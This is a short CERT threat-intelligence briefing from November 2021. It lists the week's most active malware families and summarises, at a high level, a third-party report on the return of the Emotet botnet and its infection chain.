Briefing Malware
BLOG CERT SOGETI ESEC
CERT BRIEFING MALWARE

Briefing Malware - 23/11/2021

23th of November 2021 - Winners of the 47th week : Redline, Emotet and Formbook .

Some links points at extended actionnable intelligence (Threat Bulletins, TTPs, signatures, etc) on our Threat Intelligence Platform Anomali. This access is limited to our clients.

 

Threat statistics report

Publication date:

23/11/2021

Distribution :

TLP : WHITE  

What's new?

Emotet (ID Mitre: S0367)

Netskope Threat Coverage: The Return of Emotet

#Netskope published a report about the return of one of the most important threat of the beginning of this year, #Emotet. This threat has been spotted again in a campaign delivered by the #Trickbot botnet infrastructure.  Emotet is active since 2014 and was initially a #banking trojan that has evolved in a botnet used to delivered other loaders such as Trickbot or #IcedID but also #ransomware payloads namely #Ryuk before being taken down by law enforcement agencies in January 2021. The new campaign lure victims to active macros in Microsoft Office to execute obfuscated #Powershell scripts which will download malicious DLLs ending the process with a packed DLL; the last step being Emotet execution in memory. After that, Emotet will start its communications with Command and control (#C&C) servers. As of writing, there's 13 servers online.

 

https://www.netskope.com/blog/netskope-threat-coverage-the-return-of-emotet

 

Download the report